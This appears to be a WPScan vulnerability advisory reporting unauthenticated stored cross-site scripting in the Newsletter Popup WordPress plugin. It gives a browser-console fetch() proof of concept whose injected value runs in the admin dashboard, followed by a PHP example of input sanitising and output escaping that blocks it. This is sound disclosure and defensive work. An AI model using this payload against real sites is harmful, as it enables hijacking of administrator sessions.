wpvulndb | Lana Codes | WPVDB-ID:FED1E184-FF56-44FE-9876-D17C0156447A
May 02, 2023 - 12:00 a.m.

Newsletter Popup <= 1.2 - Unauthenticated Stored XSS

2023-05-02 00:00:00
Lana Codes
wpscan.com
Tags: xss, unauthenticated, plugin, cross-site scripting

EPSS: 0.001 (Low), percentile 37.7%

The plugin does not sanitise and escape some of its settings, which could allow unauthenticated users to perform Stored Cross-Site Scripting attacks.

PoC

1. Create a Newsletter popup (any will do) and publish it.
2. Use an incognito window and open the website involved, then run the following code in the browser console (change URL accordingly):

    fetch('http://localhost/wp-admin/admin-ajax.php', {
        method: 'POST',
        headers: new Headers({
            'Content-Type': 'application/x-www-form-urlencoded',
        }),
        body: 'action=savenewsletter&nlid=1&nlname=Test&nldata=EMAIL%3Dalert(1)'
    }).then(response => response.text())
      .then(result => console.log(result))
      .catch(error => console.log('error', error));

3. Go to the WP-Admin dashboard, and Newsletter Popup -> Local Record, click on Show Record.
4. The alert will trigger successfully.
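The defensive counterpart to the PoC above, as an added example that is neither the plugin's code nor its actual fix: a handler for the same `savenewsletter` action that sanitises each field on input, and a renderer that escapes on output. Only the action name and the `nlid`, `nlname` and `nldata` parameters come from the PoC; the function names, the table name and the storage format are assumptions.

```php
<?php
// Hypothetical handler: only the action name and the nlid/nlname/nldata
// parameters come from the PoC; function and table names are assumptions.
add_action( 'wp_ajax_savenewsletter', 'example_save_newsletter' );
add_action( 'wp_ajax_nopriv_savenewsletter', 'example_save_newsletter' ); // visitors submit the form

// Return a POST field only when it is a plain string (rejects nlname[]=... style arrays).
function example_post_string( $name ) {
    return ( isset( $_POST[ $name ] ) && is_string( $_POST[ $name ] ) ) ? wp_unslash( $_POST[ $name ] ) : '';
}

function example_save_newsletter() {
    global $wpdb;
    $nlid   = absint( example_post_string( 'nlid' ) );
    $nlname = sanitize_text_field( example_post_string( 'nlname' ) );

    // nldata carries "KEY=value" pairs: parse it and clean each value
    // instead of storing the raw string.
    parse_str( example_post_string( 'nldata' ), $pairs );
    $fields = array();
    foreach ( $pairs as $key => $value ) {
        if ( ! is_string( $value ) ) {
            continue; // drop nested arrays such as a[]=1
        }
        $key            = sanitize_key( $key );
        $fields[ $key ] = ( 'email' === $key ) ? sanitize_email( $value ) : sanitize_text_field( $value );
    }
    // Assumption: a record is only worth keeping with a valid e-mail address.
    if ( 0 === $nlid || empty( $fields['email'] ) ) {
        wp_send_json_error( 'Invalid submission', 400 );
    }
    $wpdb->insert(
        $wpdb->prefix . 'example_newsletter_records', // hypothetical table
        array( 'nlid' => $nlid, 'nlname' => $nlname, 'nldata' => wp_json_encode( $fields ) ),
        array( '%d', '%s', '%s' )
    );
    wp_send_json_success();
}

// Output side ("Show Record" in wp-admin): escape on render even though the
// values were cleaned on input, so rows stored before the fix stay inert.
function example_render_record( $stored_json ) {
    $fields = json_decode( $stored_json, true );
    echo '<table>';
    foreach ( (array) $fields as $key => $value ) {
        printf( '<tr><th>%s</th><td>%s</td></tr>', esc_html( $key ), esc_html( is_scalar( $value ) ? (string) $value : '' ) );
    }
    echo '</table>';
}
```

With the request body from step 2, `sanitize_email()` returns an empty string for the `EMAIL` value and the handler answers with a 400 instead of storing the record.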

CPE Name          Operator  Version
newsletter-popup  eq        *
